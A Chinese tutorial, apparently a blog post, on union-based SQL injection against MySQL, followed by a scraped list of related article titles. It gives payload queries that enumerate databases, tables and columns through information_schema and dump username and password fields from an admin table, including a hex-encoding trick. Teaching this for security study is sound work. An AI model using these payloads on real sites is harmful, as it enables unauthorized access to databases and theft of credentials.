声明:本文章只用于技术交流,若有用于其他用途导致不可逆的后果,本人概不负责; 本次交流所用数据库为自己搭建的环境。

一、什么是联合注入

因为mysql查询语句中有联合查询这个功能(union 这个函数), 所以在进行sql注入的时候,利用 union 这个函数进行sql语句的拼接, 查询到我们想要的结果。

条件: 网页上具有sql语句查询回显。

1、联合查询(展示)

2、联合注入(展示)

其中 1,2,3 为我们想要查询的结果, 为什么为 select 1,2,3 因为 users 表只有三个字段。

id = -1 是因为我们不想要第一条查询语句的结果。

3、子语句查询

为什么要讲子语句查询呢?因为要用的到。

子语句查询: 在进行查询语句时,当作查询语句的 判断条件 或者作为 回显。

听不懂看下图 (查询当前数据库用户),select user() 为子语句查询。

4、payload

列出所有数据库:

limit 一个一个打印出来库名
                select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1

group_concat 一次性全部显示
                select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
        
        只演示这一条

列出(数据库:test)中所有的表:

limit 一个一个打印出来字段名
                select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='test' limit 0,1

group_concat 一次性全部显示
                select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='test'

列出(数据库:test 表:admin )中所有的字段:

limit 一个一个打印出来
               select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='test' and TABLE_NAME='t10' limit 0,1
        
        group_concat 一次性全部显示
                select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e

把 test 换成十六进制也可以查询  t10 也同理

列出(数据库:test 表:admin )中所有的字段内容:

limit 一个一个打印出来
                select username,passwd from test.admin limit 0,1

group_concat 把 一次性全部打印
                select group_concat(concat(username,0x20,passwd)) from test.admin

谢谢各位看官老爷

sql注入之联合注入相关推荐

  1. 【愚公系列】2023年05月 网络安全高级班 065.WEB渗透与安全(SQL注入漏洞-手工注入)

    文章目录 前言 一.SQL注入漏洞-手工注入 1.错误注入 2.布尔注入 2.1 通过`'or 1=1 --` 注入 2.2 通过`admin'or 1=1 --` 注入 3.联合注入 3.1 查看u ...

  2. sql注入之堆叠注入

    一.堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在 ...

  3. SQL注入之MYSQL注入总结

    简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息. 让我们从爆破表名到了可以直接查询. information_schema是MySQL5.0以 ...

  4. WEB渗透测试知识梳理-注入类-1-SQL注入-Mysql

    渗透测试知识梳理-注入类-1-SQL注入-Mysql 1. SQL注入 1.1 漏洞简介 1.2 漏洞危害 1.3 漏洞详情 1.3.1 MySQL注入 1.3.1.1 报错注入 1. floor() ...

  5. SQL注入之union联合注入——sql-lab第一关(非常非常详细的过程)

    SQL注入介绍 什么是SQL注入: SQL注入是(SQLi)是一种注入攻击,可以执行恶意的SQL语句,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器.攻击者 ...

  6. SQL注入(SQL注入(SQLi)攻击)攻击-联合注入

    页面有显示位时 , 可用联合注入 本次以 SQLi 第一关为案例 第一步,判断注入类型 参数中添加 单引号 ' , 如果报错,说明后端没有过滤参数 , 即 存在注入 ?id=1' 从数据库的报错中我们 ...

  7. SQL注入——基于联合查询的字符型GET注入(三)

    本章目的 普及字符型GET注入的原理和特点,掌握利用联合查询(unionselect)的方法实现SQL注入的基本流程. 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 ( ...

  8. SQL注入-联合注入

    页面有显示位时 , 可用联合注入 本次以 SQLi 第一关为案例 第一步,判断注入类型 参数中添加 单引号 ' , 如果报错,说明后端没有过滤参数 , 即 存在注入 ?id=1' 从数据库的报错中我们 ...

  9. sql注入中的联合注入

    联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库.至于为什么需要版本是5.0以上的MYSQL数据库, ...

最新文章

  1. CVPR 2020 | 给Deepfake 假脸做 X-Ray,新模型把换脸图打回原形
  2. 基于redis的悲观锁实现
  3. objective-c中Category类别(扩展类)专题总结
  4. 转:CMake 使用方法
  5. 通过IHS(IBM HTTP SERVER)转发WAS(WEBSPHERE)应用的小问题
  6. 智力面试题汇总,有意思!
  7. android+adt+很慢,Android的模拟器,在ADT中调试运行AVD时,速度太慢
  8. java 基本数据类型和包装类型
  9. 华为推出地图服务 助力开发者强化地图能力
  10. 计算机运算方法与机器指令
  11. 推荐系列:2008年第05期 总7期
  12. DOM 其他一些特性
  13. PostGis加载空间数据
  14. 常用游戏分析工具 之 PChunter 及 procexp 使用心得
  15. 基于熵权法评估某高校各班级整体情况(公式详解+简单工具介绍)
  16. 利用selenium实现中国裁判文书网自动登录批量下载功能
  17. Android 使用三级缓存实现对图片的加载
  18. MySQL入门教程:基本概念
  19. 8.10 12.1-12.5
  20. css如何在下拉框添加倒三角,CSS给选中元素增加倒三角形(示例代码)

热门文章

  1. linux系统发qq邮箱文件,Linux打印文件和发送邮件
  2. python足球_使用Python抓取欧洲足球联赛数据
  3. 大学毕业小总结以及感想
  4. java/php/net/python教学评价系统设计
  5. Drupal Views教程
  6. node联合echarts简单实现疫情地图
  7. guid分区怎么装win7_如何在GUID分区装win7系统并以UEFI启动?
  8. 力扣 1833. 雪糕的最大数量
  9. 常用商务邮箱:常用商务邮箱注册
  10. Python语言课程设计名片管理系统